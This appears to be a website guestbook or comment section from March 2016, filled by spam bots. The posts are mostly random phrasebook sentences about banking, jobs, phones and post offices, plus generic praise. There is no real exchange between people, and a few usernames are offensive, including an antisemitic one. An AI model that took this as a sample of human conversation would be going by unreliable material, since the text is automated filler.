385. Reyes: I'm a member of a gym - 2016/03/04 21:30:45
386. Monroe: I'm on holiday - 2016/03/04 21:30:47
387. Johnathon: How many are there in a book? - 2016/03/04 21:30:50
388. Harris: One moment, please - 2016/03/04 21:30:53
389. Isabelle: I'm unemployed - 2016/03/04 21:30:55
390. Emerson: No, I'm not particularly sporty - 2016/03/04 21:30:57
391. Rodger: When can you start? - 2016/03/04 22:58:31
392. Xavier: I wanted to live abroad - 2016/03/04 22:58:33
393. Crazyfrog: A law firm - 2016/03/04 22:58:35
394. Giovanni: Best Site Good Work - 2016/03/04 22:58:37
395. Murray: Some First Class stamps - 2016/03/04 22:58:40
396. Donte: Looking for a job - 2016/03/04 22:58:44
397. Cedric: I'm unemployed - 2016/03/04 22:58:46
398. Desmond: Do you know the address? - 2016/03/04 22:58:48
399. Gregory: I've been cut off - 2016/03/04 22:58:50
400. Gabriel: A few months - 2016/03/04 22:58:54
401. Roger: Your cash is being counted - 2016/03/05 00:25:24
402. Ezekiel: Yes, I play the guitar - 2016/03/05 00:25:27
403. Jane: I stay at home and look after the children - 2016/03/05 00:25:30
404. Dewitt: I'd like to apply for this job - 2016/03/05 00:25:32
405. Vanessa: I've only just arrived - 2016/03/05 00:25:34
406. Boris: The manager - 2016/03/05 00:25:36
407. Shayne: Can I call you back? - 2016/03/05 00:25:39
408. Josiah: We need someone with experience - 2016/03/05 00:25:42
409. Stanton: Languages - 2016/03/05 00:25:45
410. Jordan: Where are you from? - 2016/03/05 00:25:47
411. Brady: I need to charge up my phone - 2016/03/05 01:52:54
412. Cristobal: Have you got a telephone directory? - 2016/03/05 01:52:56
413. Romeo: Would you like a receipt? - 2016/03/05 01:52:59
414. Randy: Get a job - 2016/03/05 01:53:01
415. Charley: How many weeks' holiday a year are there? - 2016/03/05 01:53:03
416. Barrett: Could you please repeat that? - 2016/03/05 01:53:06
417. Quinn: Who would I report to? - 2016/03/05 01:53:08
418. Donny: History - 2016/03/05 01:53:10
419. Hiram: Could you please repeat that? - 2016/03/05 01:53:12
420. Rhett: Not available at the moment - 2016/03/05 01:53:14
421. Goodsam: The manager - 2016/03/05 03:19:27
422. Dro4er: I came here to study - 2016/03/05 03:19:29
423. Isaiah: A pension scheme - 2016/03/05 03:19:31
424. Dogkill: I'm not interested in football - 2016/03/05 03:19:33
425. Andre: Which year are you in? - 2016/03/05 03:19:35
426. Ferdinand: I'd like to send this letter by - 2016/03/05 03:19:38
427. Riley: I've got a full-time job - 2016/03/05 03:19:40
428. Antwan: I'm not working at the moment - 2016/03/05 03:19:42
429. Colton: I'm unemployed - 2016/03/05 03:19:44
430. Daniel: I'm a trainee - 2016/03/05 03:19:48
431. Camila: What do you study? - 2016/03/05 04:45:37
432. Valentin: What's the last date I can post this to to arrive in time for Christmas? - 2016/03/05 04:45:41
433. Nathan: I'm retired - 2016/03/05 04:45:42
434. Winston: Who's calling? - 2016/03/05 04:45:44
435. Plank: How much were you paid in your last job? - 2016/03/05 04:45:46
436. Roberto: I'm sorry, I didn't catch your name - 2016/03/05 04:45:48
437. Hannah: Will I have to work on Saturdays? - 2016/03/05 04:45:51
438. Chung: real beauty page - 2016/03/05 04:45:54
439. Hershel: I went to - 2016/03/05 04:45:56
440. Walter: I'm a housewife - 2016/03/05 04:45:58
441. Marvin: I'm self-employed - 2016/03/05 06:11:18
442. August: Hold the line, please - 2016/03/05 06:11:20
443. Victoria: I'm from England - 2016/03/05 06:11:22
444. Samual: A pension scheme - 2016/03/05 06:11:25
445. Theodore: International directory enquiries - 2016/03/05 06:11:28
446. Wyatt: I've got a full-time job - 2016/03/05 06:11:30
447. Murray: I'm from England - 2016/03/05 06:11:33
448. Rodolfo: Could you tell me the number for ? - 2016/03/05 06:11:35
449. Andrew: I'm not sure - 2016/03/05 06:11:38
450. Wesley: What's the last date I can post this to to arrive in time for Christmas? - 2016/03/05 06:11:40
451. Heriberto: I've lost my bank card - 2016/03/05 07:57:14
452. Kristopher: I'm sorry, I'm not interested - 2016/03/05 07:57:17
453. Rodolfo: I'd like , please - 2016/03/05 07:57:20
454. Ellis: I'd like to pay this cheque in, please - 2016/03/05 07:57:22
455. Warren: What qualifications have you got? - 2016/03/05 07:57:25
456. Nelson: I live here - 2016/03/05 07:57:28
457. Hailey: I came here to work - 2016/03/05 07:57:30
458. Stuart: I've just started at - 2016/03/05 07:57:32
459. Dallas: I was born in Australia but grew up in England - 2016/03/05 07:57:35
460. Jarod: I was made redundant two months ago - 2016/03/05 07:57:38
461. Stacy: Whereabouts in are you from? - 2016/03/05 09:22:40
462. Razer22: I'd like to pay this in, please - 2016/03/05 09:22:42
463. Dudley: Who do you work for? - 2016/03/05 09:22:44
464. Infest: I'd like to take the job - 2016/03/05 09:22:46
465. Basil: Just over two years - 2016/03/05 09:22:49
466. Mya: I didn't go to university - 2016/03/05 09:22:52
467. Shirley: Recorded Delivery - 2016/03/05 09:22:54
468. Behappy: A pension scheme - 2016/03/05 09:22:56
469. Vida: Will I have to work shifts? - 2016/03/05 09:22:59
470. Rudolph: What's the interest rate on this account? - 2016/03/05 09:23:01
471. Marquis: Have you read any good books lately? - 2016/03/05 10:48:37
472. Lazaro: I live here - 2016/03/05 10:48:40
473. Delmar: Please call back later - 2016/03/05 10:48:42
474. Marcos: Which year are you in? - 2016/03/05 10:48:44
475. Marco: I work for myself - 2016/03/05 10:48:47
476. Crazyivan: I'm a housewife - 2016/03/05 10:48:50
477. Brenton: How much is a Second Class stamp? - 2016/03/05 10:48:52
478. Weldon: I'm a partner in - 2016/03/05 10:48:54
479. Erick: When can you start? - 2016/03/05 10:48:58
480. Dallas: A First Class stamp - 2016/03/05 10:49:01
481. Andre: Enter your PIN - 2016/03/05 12:14:42
482. Fermin: Not in at the moment - 2016/03/05 12:14:43
483. Luke: Who do you work for? - 2016/03/05 12:14:46
484. Donnell: Remove card - 2016/03/05 12:14:48
485. Rodger: What's the interest rate on this account? - 2016/03/05 12:14:50
486. Preston: What do you like doing in your spare time? - 2016/03/05 12:14:52
487. Brock: I do some voluntary work - 2016/03/05 12:14:54
488. Conrad: I'd like to pay this cheque in, please - 2016/03/05 12:14:57
489. Dylan: Not in at the moment - 2016/03/05 12:14:59
490. Jefferson: I live in London - 2016/03/05 12:15:02
491. Gustavo: Could I make an appointment to see ? - 2016/03/05 13:40:44
492. Tomas: very best job - 2016/03/05 13:40:46
493. Mary: A financial advisor - 2016/03/05 13:40:48
494. Anthony: I'd like to take the job - 2016/03/05 13:40:50
495. Mickey: Will I be paid weekly or monthly? - 2016/03/05 13:40:53
496. Scottie: I'm doing a masters in law - 2016/03/05 13:40:56
497. Dante: What qualifications have you got? - 2016/03/05 13:40:59
498. Dro4er: How would you like the money? - 2016/03/05 13:41:00
499. Moises: I'm on holiday - 2016/03/05 13:41:04
500. Benito: Punk not dead - 2016/03/05 13:41:06
501. Merle: Could you send me an application form? - 2016/03/05 15:07:16
502. Amelia: Who's calling? - 2016/03/05 15:07:18
503. Terrence: Could I have an application form? - 2016/03/05 15:07:20
504. Billy: It's a bad line - 2016/03/05 15:07:22
505. Willie: I work with computers - 2016/03/05 15:07:27
506. Shaun: Lost credit card - 2016/03/05 15:07:29
507. Gaston: Have you got any experience? - 2016/03/05 15:07:32
508. Audrey: Could you give me some smaller notes? - 2016/03/05 15:07:34
509. Lewis: What do you like doing in your spare time? - 2016/03/05 15:07:37
510. Eli: How much will it cost to send this letter to ? - 2016/03/05 15:07:39
511. Valentine: Thanks for calling - 2016/03/05 16:33:48
512. Richard: How do you spell that? - 2016/03/05 16:33:50
513. Brain: Will I be paid weekly or monthly? - 2016/03/05 16:33:53
514. Ambrose: Will I get paid for overtime? - 2016/03/05 16:33:55
515. Jamel: I really like swimming - 2016/03/05 16:33:57
516. Ronny: Do you have any exams coming up? - 2016/03/05 16:34:00
517. Dewayne: Which university are you at? - 2016/03/05 16:34:02
518. Carlos: i'm fine good work - 2016/03/05 16:34:04
519. Stewart: Could I have , please? - 2016/03/05 16:34:07
520. Kristopher: We're at university together - 2016/03/05 16:34:09
521. Garland: Can you hear me OK? - 2016/03/05 17:59:57
522. Forest: Where's the postbox? - 2016/03/05 18:00:00
523. Gerry: I'm a housewife - 2016/03/05 18:00:02
524. Rhett: Children with disabilities - 2016/03/05 18:00:04
525. Andres: A book of First Class stamps - 2016/03/05 18:00:07
526. Garry: I stay at home and look after the children - 2016/03/05 18:00:10
527. Courtney: I'd like to cancel a cheque - 2016/03/05 18:00:13
528. Reyes: Your account's overdrawn - 2016/03/05 18:00:16
529. Darwin: This site is crazy :) - 2016/03/05 18:00:18
530. Buddy: A pension scheme - 2016/03/05 18:00:20
531. Cleveland: I'll put him on - 2016/03/05 19:26:16
532. Dro4er: Have you got a telephone directory? - 2016/03/05 19:26:18
533. Shirley: I can't hear you very well - 2016/03/05 19:26:20
534. Eugene: I'd like , please - 2016/03/05 19:26:24
535. Wilfredo: Could I order a new chequebook, please? - 2016/03/05 19:26:26
536. Ervin: Your cash is being counted - 2016/03/05 19:26:28
537. Diego: I'd like to tell you about a change of address - 2016/03/05 19:26:32
538. Orville: I'm a member of a gym - 2016/03/05 19:26:35
539. Howard: I'm originally from Dublin but now live in Edinburgh - 2016/03/05 19:26:37
540. Ronald: I'm self-employed - 2016/03/05 19:26:39
541. Bobber: I didn't go to university - 2016/03/05 20:53:05
542. Jimmie: A pension scheme - 2016/03/05 20:53:07
543. Ronny: I work here - 2016/03/05 20:53:09
544. Mario: Where do you live? - 2016/03/05 20:53:11
545. Patrick: Could I make an appointment to see ? - 2016/03/05 20:53:13
546. Jerrod: Children with disabilities - 2016/03/05 20:53:16
547. Dro4er: Some First Class stamps - 2016/03/05 20:53:18
548. Ralph: I'm a member of a gym - 2016/03/05 20:53:21
549. Cornell: I don't know what I want to do after university - 2016/03/05 20:53:23
550. Nigel: I'm sorry, I didn't catch your name - 2016/03/05 20:53:26
551. Philip: Have you read any good books lately? - 2016/03/05 22:21:05
552. Stevie: I'm interested in - 2016/03/05 22:21:09
553. Brenton: It's serious - 2016/03/05 22:21:12
554. Angelo: Enter your PIN - 2016/03/05 22:21:15
555. Cornelius: A staff restaurant - 2016/03/05 22:21:18
556. Rodrick: I wanted to live abroad - 2016/03/05 22:21:22
557. Douglas: How do you spell that? - 2016/03/05 22:21:25
558. Leonardo: What do you do? - 2016/03/05 22:21:28
559. Goodsam: I'd like , please - 2016/03/05 22:21:32
560. Jacques: Recorded Delivery - 2016/03/05 22:21:35
561. Hunter: How long have you lived here? - 2016/03/05 23:49:25
562. Cornell: Could you tell me the number for ? - 2016/03/05 23:49:27
563. Ronald: How many more years do you have to go? - 2016/03/05 23:49:29
564. Titus: Could I ask who's calling? - 2016/03/05 23:49:33
565. Maynard: What do you want to do when you've finished? - 2016/03/05 23:49:35
566. Lowell: International directory enquiries - 2016/03/05 23:49:37
567. Vincenzo: Could I borrow your phone, please? - 2016/03/05 23:49:40
568. Sanford: I've just graduated - 2016/03/05 23:49:42
569. Keith: I study here - 2016/03/05 23:49:44
570. Fredric: I'm at Liverpool University - 2016/03/05 23:49:47
571. Alfred: We work together - 2016/03/06 01:17:07
572. Edmund: Could you tell me the dialing code for ? - 2016/03/06 01:17:09
573. Razer22: Could I have an application form? - 2016/03/06 01:17:12
574. Francisco: I came here to work - 2016/03/06 01:17:16
575. Weldon: this is be cool 8) - 2016/03/06 01:17:19
576. Barton: I'd like to cancel a cheque - 2016/03/06 01:17:23
577. Jackie: Could I borrow your phone, please? - 2016/03/06 01:17:26
578. Gerardo: I sing in a choir - 2016/03/06 01:17:29
579. Merlin: Another year - 2016/03/06 01:17:33
580. Anderson: Until August - 2016/03/06 01:17:35
581. Sydney: this post is fantastic - 2016/03/06 02:44:55
582. Florencio: The line's engaged - 2016/03/06 02:44:56
583. Antone: I'd like to transfer some money to this account - 2016/03/06 02:44:59
584. Santo: Sorry, I'm busy at the moment - 2016/03/06 02:45:01
585. Newton: A book of First Class stamps - 2016/03/06 02:45:03
586. Dominick: I'm afraid that number's ex-directory - 2016/03/06 02:45:05
587. Carlton: Could I make an appointment to see ? - 2016/03/06 02:45:07
588. Kaden: I'd like to change some money - 2016/03/06 02:45:11
589. Errol: On another call - 2016/03/06 02:45:13
590. Lionel: Could I have an application form? - 2016/03/06 02:45:16
591. Luther: Do you like it here? - 2016/03/06 04:14:24
592. Virgilio: I'll put her on - 2016/03/06 04:14:26
593. Andreas: this post is fantastic - 2016/03/06 04:14:28
594. Goodsam: I can't get a signal - 2016/03/06 04:14:30
595. Mervin: I saw your advert in the paper - 2016/03/06 04:14:33
596. Myron: I've just started at - 2016/03/06 04:14:35
597. Maynard: Will I have to work on Saturdays? - 2016/03/06 04:14:38
598. Emmitt: Incorrect PIN - 2016/03/06 04:14:41
599. Johnnie: I work with computers - 2016/03/06 04:14:44
600. Elijah: this is be cool 8) - 2016/03/06 04:14:46
601. Rolando: I'd like to open a business account - 2016/03/06 05:41:04
602. Fausto: Where do you come from? - 2016/03/06 05:41:07
603. Domenic: I read a lot - 2016/03/06 05:41:09
604. Seth: Would you like a receipt? - 2016/03/06 05:41:13
605. Napoleon: Good crew it's cool :) - 2016/03/06 05:41:16
606. Jocelyn: Whereabouts in are you from? - 2016/03/06 05:41:18
607. Curt: Could I order a new chequebook, please? - 2016/03/06 05:41:21
608. Florentino: I've only just arrived - 2016/03/06 05:41:24
609. Roscoe: A law firm - 2016/03/06 05:41:27
610. Marcos: I've only just arrived - 2016/03/06 05:41:30
611. Robin: I'd like to speak to someone about a mortgage - 2016/03/06 07:17:39
612. Alvaro: Why did you come to ? - 2016/03/06 07:17:41
613. Jackie: I'd like to withdraw $100, please - 2016/03/06 07:17:44
614. Megan: I can't get through at the moment - 2016/03/06 07:17:47
615. Clarence: I'm only getting an answering machine - 2016/03/06 07:17:50
616. Vernon: It's OK - 2016/03/06 07:17:53
617. Kidrock: What do you like doing in your spare time? - 2016/03/06 07:17:55
618. Kevin: I'm from England - 2016/03/06 07:17:58
619. Coolman: I sing in a choir - 2016/03/06 07:18:00
620. Nickolas: Hold the line, please - 2016/03/06 07:18:04
621. Kerry: I wanted to live abroad - 2016/03/06 08:43:25
622. Jennifer: Good crew it's cool :) - 2016/03/06 08:43:27
623. Julian: I can't hear you very well - 2016/03/06 08:43:29
624. Bradford: Could you tell me the dialing code for ? - 2016/03/06 08:43:31
625. Raymundo: Accountant supermarket manager - 2016/03/06 08:43:34
626. Gracie: This is the job description - 2016/03/06 08:43:38
627. Fabian: I've just graduated - 2016/03/06 08:43:40
628. Trent: Could I take your name and number, please? - 2016/03/06 08:43:43
629. Sandy: Have you read any good books lately? - 2016/03/06 08:43:46
630. Chung: I'm doing an internship - 2016/03/06 08:43:48
631. Wilbert: How many days will it take for the cheque to clear? - 2016/03/06 10:09:44
632. Moses: Have you got a telephone directory? - 2016/03/06 10:09:46
633. Michale: An estate agents - 2016/03/06 10:09:49
634. Edward: I'm on business - 2016/03/06 10:09:51
635. Alfredo: What do you do? - 2016/03/06 10:09:54
636. Jonas: I'd like a phonecard, please - 2016/03/06 10:09:57
637. Moses: Which team do you support? - 2016/03/06 10:10:00
638. Clifton: I'm doing a masters in law - 2016/03/06 10:10:03
639. Dusty: I didn't go to university - 2016/03/06 10:10:05
640. Weston: Recorded Delivery - 2016/03/06 10:10:08
641. Herschel: Have you read any good books lately? - 2016/03/06 11:34:58
642. Johnathon: I've lost my bank card - 2016/03/06 11:35:00
643. Tyson: Could you tell me the number for ? - 2016/03/06 11:35:02
644. Gaston: Children with disabilities - 2016/03/06 11:35:04
645. Shannon: Where do you study? - 2016/03/06 11:35:07
646. Brooke: Canada>Canada - 2016/03/06 11:35:09
647. Carmen: What sort of music do you listen to? - 2016/03/06 11:35:12
648. Clemente: Could you please repeat that? - 2016/03/06 11:35:15
649. Cecil: I'd like to open a personal account - 2016/03/06 11:35:19
650. Wendell: It's serious - 2016/03/06 11:35:21
651. Warner: Will I get paid for overtime? - 2016/03/06 13:00:20
652. Reuben: Please call back later - 2016/03/06 13:00:24
653. Shane: I like watching football - 2016/03/06 13:00:27
654. Randell: Which team do you support? - 2016/03/06 13:00:29
655. Thanh: Where do you study? - 2016/03/06 13:00:32
656. Felix: Punk not dead - 2016/03/06 13:00:36
657. Katelyn: Could you ask her to call me? - 2016/03/06 13:00:39
658. Daron: It's OK - 2016/03/06 13:00:42
659. Esteban: I'm only getting an answering machine - 2016/03/06 13:00:45
660. Kieth: Could I ask who's calling? - 2016/03/06 13:00:49
661. Santo: How do you do? - 2016/03/06 14:26:03
662. Garry: very best job - 2016/03/06 14:26:04
663. Friend35: I'm on business - 2016/03/06 14:26:06
664. Courtney: One moment, please - 2016/03/06 14:26:08
665. Micah: I live here - 2016/03/06 14:26:13
666. Kermit: I can't get a dialling tone - 2016/03/06 14:26:16
667. Freelove: Recorded Delivery - 2016/03/06 14:26:19
668. Moises: I'm doing an internship - 2016/03/06 14:26:23
669. Craig: Languages - 2016/03/06 14:26:26
670. Brett: Could I have a statement, please? - 2016/03/06 14:26:29
671. Rolland: How would you like the money? - 2016/03/06 15:52:24
672. Salvatore: What part of do you come from? - 2016/03/06 15:52:26
673. Marvin: How do you know each other? - 2016/03/06 15:52:28
674. John: I'd like to open a business account - 2016/03/06 15:52:31
675. Ella: We used to work together - 2016/03/06 15:52:34
676. Moshe: On another call - 2016/03/06 15:52:36
677. Bryon: I live in London - 2016/03/06 15:52:38
678. Humberto: Insufficient funds - 2016/03/06 15:52:41
679. Bobby: I'd like to withdraw $100, please - 2016/03/06 15:52:44
680. Adolfo: What's the last date I can post this to to arrive in time for Christmas? - 2016/03/06 15:52:46
681. Benny: What's the current interest rate for personal loans? - 2016/03/06 17:18:35
682. Rickey: I'm from England - 2016/03/06 17:18:36
683. Gerardo: What part of do you come from? - 2016/03/06 17:18:38
684. Rocky: No, I'm not particularly sporty - 2016/03/06 17:18:40
685. Eliseo: What do you do? - 2016/03/06 17:18:43
686. Dannie: I sing in a choir - 2016/03/06 17:18:46
687. Preston: magic story very thanks - 2016/03/06 17:18:49
688. Ashton: I'm not interested in football - 2016/03/06 17:18:51
689. Donnie: Could you transfer $1000 from my current account to my deposit account? - 2016/03/06 17:18:53
690. Daryl: I don't know what I want to do after university - 2016/03/06 17:18:57
691. Fifa55: I'd like to pay this cheque in, please - 2016/03/06 18:44:44
692. Darwin: Punk not dead - 2016/03/06 18:44:46
693. Carmine: I'd like to speak to someone about a mortgage - 2016/03/06 18:44:48
694. Seymour: I'd like to open an account - 2016/03/06 18:44:50
695. Thaddeus: Have you got any experience? - 2016/03/06 18:44:52
696. Bennett: Where do you live? - 2016/03/06 18:44:55
697. Hubert: Best Site Good Work - 2016/03/06 18:44:57
698. Pablo: It's funny goodluck - 2016/03/06 18:44:59
699. Jessie: I live in London - 2016/03/06 18:45:01
700. Felton: I'm a partner in - 2016/03/06 18:45:04
701. Lynwood: Punk not dead - 2016/03/06 20:11:30
702. Monroe: Could I take your name and number, please? - 2016/03/06 20:11:33
703. Sylvester: I'm sorry, he's - 2016/03/06 20:11:36
704. Darrell: Special Delivery - 2016/03/06 20:11:38
705. Emily: I'm sorry, I didn't catch your name - 2016/03/06 20:11:41
706. Lawerence: Get a job - 2016/03/06 20:11:44
707. Gilbert: Other amount - 2016/03/06 20:11:46
708. Trinity: How many would you like? - 2016/03/06 20:11:50
709. Curt: I'm doing a masters in law - 2016/03/06 20:11:54
710. Quintin: Could you send me an application form? - 2016/03/06 20:11:57
711. Francesco: Who's calling? - 2016/03/06 21:39:25
712. Gavin: What do you want to do when you've finished? - 2016/03/06 21:39:28
713. Isaac: Whereabouts are you from? - 2016/03/06 21:39:30
714. Reginald: I'm not interested in football - 2016/03/06 21:39:32
715. Jarrod: I'm sorry, he's - 2016/03/06 21:39:35
716. Leonardo: Lost credit card - 2016/03/06 21:39:37
717. Alex: On another call - 2016/03/06 21:39:40
718. Hershel: I work with computers - 2016/03/06 21:39:44
719. Micheal: I'm on a course at the moment - 2016/03/06 21:39:46
720. Paris: perfect design thanks - 2016/03/06 21:39:48
721. Romeo: What qualifications have you got? - 2016/03/06 23:07:41
722. Jefferson: I'd like to transfer some money to this account - 2016/03/06 23:07:43
723. Antonio: Looking for a job - 2016/03/06 23:07:45
724. Mikel: I'd like to send this letter by - 2016/03/06 23:07:48
725. Willie: Could I have an application form? - 2016/03/06 23:07:50
726. Jerrod: I'm sorry, he's - 2016/03/06 23:07:53
727. Alvin: I live in London - 2016/03/06 23:07:56
728. Avery: Did you go to university? - 2016/03/06 23:07:59
729. Makayla: I'd like to open a personal account - 2016/03/06 23:08:02
730. Archie: Where are you calling from? - 2016/03/06 23:08:04
731. Myles: How do you do? - 2016/03/07 00:36:30
732. Boyce: I like it a lot - 2016/03/07 00:36:33
733. Percy: Very interesting tale - 2016/03/07 00:36:35
734. Rikky: I've lost my bank card - 2016/03/07 00:36:38
735. Reyes: Have you got a telephone directory? - 2016/03/07 00:36:41
736. Andre: How do you do? - 2016/03/07 00:36:43
737. Faith: Other amount - 2016/03/07 00:36:45
738. Valeria: History - 2016/03/07 00:36:49
739. Jaime: Have you read any good books lately? - 2016/03/07 00:36:51
740. Lindsay: I'm training to be an engineer - 2016/03/07 00:36:53
741. Ignacio: Hello good day - 2016/03/07 02:02:45
742. Vincenzo: Which university are you at? - 2016/03/07 02:02:48
743. Nilson: Go travelling - 2016/03/07 02:02:51
744. Dewitt: I'd like to send this parcel to - 2016/03/07 02:02:54
745. Felix: I love this site - 2016/03/07 02:02:57
746. Henry: I work with computers - 2016/03/07 02:03:00
747. Domingo: Could you tell me my balance, please? - 2016/03/07 02:03:02
748. Chester: good material thanks - 2016/03/07 02:03:05
749. Homer: How much notice do you have to give? - 2016/03/07 02:03:08
750. Jarrett: Is there ? - 2016/03/07 02:03:11
751. Joshua: I'll send you a text - 2016/03/07 03:30:45
752. Eldridge: Would you like to leave a message? - 2016/03/07 03:30:47
753. Emerson: Can I call you back? - 2016/03/07 03:30:51
754. Lucas: What sort of music do you like? - 2016/03/07 03:30:53
755. Unlove: I stay at home and look after the children - 2016/03/07 03:30:56
756. Ulysses: I went to - 2016/03/07 03:30:58
757. Ervin: How many weeks' holiday a year are there? - 2016/03/07 03:31:01
758. Roscoe: Is it convenient to talk at the moment? - 2016/03/07 03:31:04
759. Eduardo: Will I get travelling expenses? - 2016/03/07 03:31:07
760. Josue: I'm in my first year at university - 2016/03/07 03:31:10
761. Bryce: I want to report a - 2016/03/07 04:57:39
762. Marcos: It's a bad line - 2016/03/07 04:57:42
763. Isaiah: I'll text you later - 2016/03/07 04:57:45
764. Isabella: I want to report a - 2016/03/07 04:57:48
765. Malcolm: Could you send me an application form? - 2016/03/07 04:57:52
766. Darnell: I hate shopping - 2016/03/07 04:57:55
767. Randell: It's funny goodluck - 2016/03/07 04:57:58
768. Ryan: My battery's about to run out - 2016/03/07 04:58:01
769. Benjamin: How long are you planning to stay here? - 2016/03/07 04:58:03
770. Harold: What line of work are you in? - 2016/03/07 04:58:06
771. Florentino: How much were you paid in your last job? - 2016/03/07 06:44:05
772. Claire: This is your employment contract - 2016/03/07 06:44:06
773. Richie: An envelope - 2016/03/07 06:44:09
774. Tyrell: Do you know the address? - 2016/03/07 06:44:11
775. Philip: A staff restaurant - 2016/03/07 06:44:14
776. Madison: In tens, please (ten pound notes) - 2016/03/07 06:44:17
777. Glenn: Do you like it here? - 2016/03/07 06:44:21
778. Bruno: We work together - 2016/03/07 06:44:24
779. Preston: Just over two years - 2016/03/07 06:44:27
780. Kimberly: What are the hours of work? - 2016/03/07 06:44:30
781. Devin: Best Site Good Work - 2016/03/07 08:09:49
782. Antonio: Punk not dead - 2016/03/07 08:09:53
783. Elmer: Have you seen any good films recently? - 2016/03/07 08:09:56
784. Moises: this is be cool 8) - 2016/03/07 08:09:59
785. Abram: Which university are you at? - 2016/03/07 08:10:01
786. Hayden: I'd like to speak to someone about a mortgage - 2016/03/07 08:10:04
787. Casey: What's the last date I can post this to to arrive in time for Christmas? - 2016/03/07 08:10:07
788. Franklin: I'll put him on - 2016/03/07 08:10:10
789. Rebecca: How do you know each other? - 2016/03/07 08:10:14
790. Rachel: How much is a First Class stamp? - 2016/03/07 08:10:18
791. Edmundo: I'm sorry, I didn't catch your name - 2016/03/07 09:34:30
792. Dwain: Canada>Canada - 2016/03/07 09:34:32
793. Jules: I've come to collect a parcel - 2016/03/07 09:34:36
794. Dominic: I'd like to send this parcel to - 2016/03/07 09:34:38
795. Salvador: I'm at Liverpool University - 2016/03/07 09:34:41
796. Carmine: good material thanks - 2016/03/07 09:34:43
797. Korey: No, I'm not particularly sporty - 2016/03/07 09:34:45
798. Rudolph: I stay at home and look after the children - 2016/03/07 09:34:48
799. Lemuel: I can't get a dialling tone - 2016/03/07 09:34:51
800. Daniel: US dollars - 2016/03/07 09:34:54
801. Darrin: Could I take your name and number, please? - 2016/03/07 10:57:55
802. Kurtis: One moment, please - 2016/03/07 10:57:59
803. Herschel: Could you ask him to call me? - 2016/03/07 10:58:01
804. Trent: Looking for a job - 2016/03/07 10:58:04
805. Lanny: On another call - 2016/03/07 10:58:07
806. Buster: Would you like to leave a message? - 2016/03/07 10:58:09
807. Jose: The line's engaged - 2016/03/07 10:58:13
808. Maria: good material thanks - 2016/03/07 10:58:16
809. Milford: I enjoy travelling - 2016/03/07 10:58:19
810. Dogkill: Go travelling - 2016/03/07 10:58:23
811. Nickolas: Who do you work for? - 2016/03/07 12:22:15
812. Reyes: What line of work are you in? - 2016/03/07 12:22:17
813. Bailey: I work here - 2016/03/07 12:22:20
814. Chloe: A Second Class stamp - 2016/03/07 12:22:23
815. Eusebio: Where do you live? - 2016/03/07 12:22:26
816. Elbert: What qualifications have you got? - 2016/03/07 12:22:29
817. Corey: I'll put her on - 2016/03/07 12:22:32
818. Teodoro: I'm happy very good site - 2016/03/07 12:22:34
819. Harry: We're at university together - 2016/03/07 12:22:37
820. Renato: I'm about to run out of credit - 2016/03/07 12:22:39
821. Maria: How do you do? - 2016/03/07 13:47:14
822. Sherman: I've got a full-time job - 2016/03/07 13:47:17
823. Lazaro: Will I be paid weekly or monthly? - 2016/03/07 13:47:21
824. Colin: I'm on business - 2016/03/07 13:47:24
825. Felton: I'll text you later - 2016/03/07 13:47:27
826. Leslie: Could you ask her to call me? - 2016/03/07 13:47:29
827. Tristan: Have you got a current driving licence? - 2016/03/07 13:47:33
828. Waldo: this post is fantastic - 2016/03/07 13:47:36
829. Andrea: I'm afraid that number's ex-directory - 2016/03/07 13:47:38
830. Amber: I'd like to pay this cheque in, please - 2016/03/07 13:47:42
831. Theron: Could you tell me the dialing code for ? - 2016/03/07 15:13:01
832. Zachary: I'm a member of a gym - 2016/03/07 15:13:03
833. Lorenzo: Languages - 2016/03/07 15:13:06
834. Milford: very best job - 2016/03/07 15:13:08
835. Lucky: I've lost my bank card - 2016/03/07 15:13:10
836. Eva: What's the exchange rate for euros? - 2016/03/07 15:13:13
837. Eva: What do you study? - 2016/03/07 15:13:15
838. Monty: Whereabouts in are you from? - 2016/03/07 15:13:17
839. Davis: I'll send you a text - 2016/03/07 15:13:22
840. Brooklyn: Directory enquiries - 2016/03/07 15:13:26
841. Johnathon: When do you want me to start? - 2016/03/07 16:38:29
842. Carlo: Hello good day - 2016/03/07 16:38:33
843. Nevaeh: I'm sorry, she's - 2016/03/07 16:38:35
844. Elijah: Could I borrow your phone, please? - 2016/03/07 16:38:38
845. Kasey: Which university are you at? - 2016/03/07 16:38:41
846. Pasquale: I'm doing a masters in law - 2016/03/07 16:38:44
847. Franklin: A financial advisor - 2016/03/07 16:38:48
848. Osvaldo: How do you spell that? - 2016/03/07 16:38:52
849. Jerry: Do you know what extension he's on? - 2016/03/07 16:38:55
850. Emile: I'd like to order some foreign currency - 2016/03/07 16:38:59
851. Malcom: How much notice do you have to give? - 2016/03/07 18:04:35
852. Rodney: Will I have to work shifts? - 2016/03/07 18:04:37
853. Antonia: I have my own business - 2016/03/07 18:04:40
854. Murray: Can I call you back? - 2016/03/07 18:04:43
855. Rosario: Incorrect PIN - 2016/03/07 18:04:46
856. Felton: In a meeting - 2016/03/07 18:04:50
857. Xavier: I've come to collect a parcel - 2016/03/07 18:04:53
858. Weldon: I don't know what I want to do after university - 2016/03/07 18:04:56
859. Britt: A pension scheme - 2016/03/07 18:04:59
860. Denny: How many would you like? - 2016/03/07 18:05:02
861. Benedict: On another call - 2016/03/07 19:30:32
862. Raymond: I wanted to live abroad - 2016/03/07 19:30:36
863. Antwan: I'm in a band - 2016/03/07 19:30:39
864. Herman: What part of do you come from? - 2016/03/07 19:30:43
865. Grover: I hate shopping - 2016/03/07 19:30:45
866. Lincoln: Get a job - 2016/03/07 19:30:48
867. Sebastian: How do you do? - 2016/03/07 19:30:52
868. Esteban: Can I take your number? - 2016/03/07 19:30:56
869. Oliver: I've lost my bank card - 2016/03/07 19:30:59
870. Millard: Sorry, I ran out of credit - 2016/03/07 19:31:02
871. Reyes: Is this a temporary or permanent position? - 2016/03/07 20:56:24
872. Melanie: I need to charge up my phone - 2016/03/07 20:56:26
873. Heyjew: On another call - 2016/03/07 20:56:30
874. Kidrock: Have you read any good books lately? - 2016/03/07 20:56:33
875. Larry: How many days will it take for the cheque to clear? - 2016/03/07 20:56:36
876. Edwardo: I didn't go to university - 2016/03/07 20:56:39
877. Chauncey: How do you spell that? - 2016/03/07 20:56:44
878. Dorian: The National Gallery - 2016/03/07 20:56:47
879. Maurice: I'm not interested in football - 2016/03/07 20:56:51
880. Lesley: I have my own business - 2016/03/07 20:56:54
881. Seth: Could I have an application form? - 2016/03/07 22:23:58
882. Elbert: I can't hear you very well - 2016/03/07 22:24:01
883. Allison: A First Class stamp - 2016/03/07 22:24:05
